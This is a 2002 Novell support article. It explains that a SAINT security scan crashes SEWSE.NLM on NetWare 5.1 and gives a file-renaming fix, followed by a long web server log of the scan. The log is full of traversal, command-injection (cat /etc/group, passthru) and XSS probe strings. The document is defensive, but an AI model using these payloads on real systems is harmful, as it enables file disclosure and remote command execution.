Saint attack causes abend in SEWSE.NLM

(Last modified: 12Sep2002)

This document (10071961) is provided subject to the disclaimer at the end of this document.

goal

SAINT attack causes abend in SEWSE.NLM

fact

Novell NetWare 5.1 Support Pack 4 (NW51SP4.EXE)

Novell Netscape Enterprise Server for NetWare

SEWSE.NLM

symptom

SAINT is an acronym for  Security Administrator's Integrated Network Tool, and is an updated and enhanced version of SATAN.  More information on it can be obtained from http://www.icewalkers.com/softlib/app/app_01049.html .  It is a tool for checking system security holes.

More information is also available at http://www.wwdsi.com/saint/ .

fix

rename or delete \NOVONYX\SUITESPOT\DOCS\SEWSE\VIEWCODE.JSE

rename or delete \NOVONYX\SUITESPOT\DOCS\SEWSE\JABBER\COMMENT2.JSE

note

Webserver log of Saint attack:

207.30.171.18 - - [14/Jun/2002:17:29:36 -0400] "(bad request line) QUIT" 400 2249
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET /cgi-bin/n0nexi5tent_fi1e.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET /cgi-bin/n0nexi5tent_fi1e.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET /cgi-bin/n0nexi5tent_cgi HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:29 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /../../../../..winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /.../.../.../.../.../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /.../.../.../.../.../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /4DBin/_/C:/winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /4DBin/_/../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:30 -0400] "GET /cgi-bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/htmlscript?../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/pfdispaly?../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/view-source?../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/htsearch?exclude=%60/etc/group%60 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/counterfiglet/nc/f=;cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/group| HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/group| HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:31 -0400] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/group%00 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /search97cgi/vtopic?action=view&ViewTemplate=../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/webplus?script=/../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/webplus.exe?script=/../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:32 -0400] "GET /cgi-bin/webplus.cgi?script=/../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20Content-Type:%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/man-cgi?%20/etc/group%20 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /opendir.php?requesturl=/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL2dyb3VwAAo HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/talkback.cgi?article=../../../../../etc/group%00&action=view&matchview=1 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/cal_make.pl?p0=../../../../../etc/group%00 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/group%00 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /basilix.php3?request_id[DUMMY]=../../../../../etc/group&RequestID=DUMMY&username=blah&password=blah HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /phpMyAdmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:33 -0400] "GET /phpPgAdmin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /phpMyAdmin/tbl_create.php?db=test&table=saint&query=dummy+integer+primary+key+auto_increment&submit=1 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /phpMyAdmin/tbl_copy.php?db=test&table=saint&new_name=test.saint2&strCopyTableOK=".passthru('cat%20/etc/group')." HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/ncbook/book.cgi?action=default&current=|cat%20/etc/group|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/webboard/generate.cgi?content=../../../../../../etc/group%00&board=boardsname HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/powerup/r.cgi?FILE=../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/r.cgi?FILE=../../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/group| HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /network_query.php?portNum=80&queryType=all&target=saint.someserver.com%3Bcat+/etc/group&Submit=Do+It HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /ifx/?LO=../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/PGPMail.txt?redirect=http://saint&recipient=saint@saint;cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/PGPMail.pl?redirect=http://saint&recipient=saint@saint;cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:34 -0400] "GET /cgi-bin/csvform.pl?file=|cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /cgi-bin/zml.cgi?file=../../../../../../etc/group%00 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /graph.php?graph=blob&command=whoami;cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /servlet/webacc?User.html=../../../../../../../../boot.ini%00 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /php/php.exe?c:oot.ini HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /cgi-bin/query?mss=../config HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /cgi-bin/bbs_forum.cgi?read=../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /cgi-bin/bbs/bbs_forum.cgi?read=../../../../etc/group HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /cgi-bin/htsearch?-c/n0nexi5tent_f1le HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:35 -0400] "GET /modules.php?op=modload&name=Network_Tools&file=index&func=ping_host&hostinput=207.30.172.197;cat%20/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf HTTP/1.0" 502 2244
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf HTTP/1.0" 200 4536
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:winntwin.ini HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /admin.php?upload=1&file=robots.txt&file_name=saint.txt&wdir=/images/&userfile=robots.txt&userfile_name=saint.txt HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:36 -0400] "GET /admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/etc/services&newfile=saint1.txt HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/boozt/admin/index.cgi?section=5&input=1 HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/test-cgi HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/wwwboard.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:37 -0400] "GET /cgi-bin/wwwboard HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/wrap HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/wrap.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/wrap.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/finger HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/finger.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /cgi-bin/finger.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:38 -0400] "GET /lcgi/ndsobj.nlm HTTP/1.0" 200 1228
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /stronghold-info HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /officescan/hotdownload/ofcscan.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/phf HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/handler HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/info2www HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/textcounter.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/glimpse HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:39 -0400] "GET /cgi-bin/aglimpse HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/webgais HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/www-sql HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/websendmail HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/jj HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/count.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /cgi-bin/imagemap.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:40 -0400] "GET /catinfo HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /plugins/squirrelspell/modules/check_me.mod.php HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /cgi-bin/csh HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /cgi-bin/bash HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /cgi-bin/zsh HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /cgi-bin/ash HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:41 -0400] "GET /cgi-bin/ksh HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-bin/sh HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-bin/perl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-bin/perl.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-bin/tcsh HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-win/uploader.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-dos/args.bat HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:42 -0400] "GET /cgi-dos/args.cmd HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /cgi-shl/win-c-sample.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /shop/product.ast HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /servlet/sunexamples.BBoardServlet HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /_private/shopping_cart.mdb HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /cgi-bin/console.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:43 -0400] "GET /piranha/secure/passwd.php3 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /scripts/cart32.exe/cart32clientlist HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /scripts/emurl/RECMAN.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/guestbook.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/excite HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/w3-msql/index.html HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/wais.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/wais/wais.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /ddrint/bin/ddicgi.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/db2www HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/db2www.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /search97cgi/vtopic HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:44 -0400] "GET /cgi-bin/webplus HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/webplus.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/webplus.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /dsgw/bin/search HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /pbserver/pbserver.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/statsconfig.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/wwwwais HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/pi HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/post-query HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /cgi-bin/websync.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:45 -0400] "GET /query.idq HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /search/query.idq HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /article.php HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /cgi-bin/CWMail.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /scripts/CWMail.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /cgi-bin/webnews.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /scripts/webnews.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /cgi-bin/genhtml.pl HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /eManager/cgi-bin/register.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /sek-bin/helpwin.gas.bat HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /interscan/cgi-bin/FtpSaveCSP.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:46 -0400] "GET /interscan/cgi-bin/FtpSaveCVP.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /<SCRIPT>alert('SAINT')</SCRIPT>.jsp HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /<SCRIPT>alert('SAINT')</SCRIPT> HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /webapp/examples/<SCRIPT>alert('SAINT')</SCRIPT> HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /jsp-mapped-dir/<SCRIPT>alert('SAINT')</SCRIPT>.jsp HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /home.nsf/<img%20src=javascript:alert('SAINT')> HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /_vti_bin/_vti_aut/fp30reg.dll?SAINT HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /scripts/cart32.exe/cart32clientlist HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /cfdocs/expeval/openfile.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:47 -0400] "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:48 -0400] "GET /cfdocs/exampleapps/publish/welcome.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:48 -0400] "GET /cfdocs/exampleapps/email/login.cfm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:48 -0400] "GET /CFIDE/Administrator/startstop.html HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:48 -0400] "GET /CFIDE/Administrator/docs/releasenotes.htm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:48 -0400] "GET /_vti_bin/_vti_aut/Dvwssr.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET //WEB-INF/ HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /./WEB-INF/web.xml HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /%3f.jsp HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../etc/group HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script> HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /_vti_pvt/users.pwd HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:49 -0400] "GET /_vti_pvt/authors.pwd HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:38:50 -0400] "GET /_vti_pvt/administrators.pwd HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:12 -0400] "GET /msadc/msadcs.dll/ActiveDataFactory.Query HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /?wp-cs-dump HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "INDEX / HTTP/1.0" 403 840
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /exec/show/config/cr HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /level/16/exec/show/config/cr HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /pls HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /pls/admin_/gateway.htm HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /demo/ojspext/events/globals.jsa HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /_ncl_subjects.shtml HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /ncl_subjects.html HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /security/web_access.html HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /scripts/root.exe?/c+dir+ HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /msadc/root.exe?/c+dir+ HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:13 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir+ HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir+ HTTP/1.0" 500 460
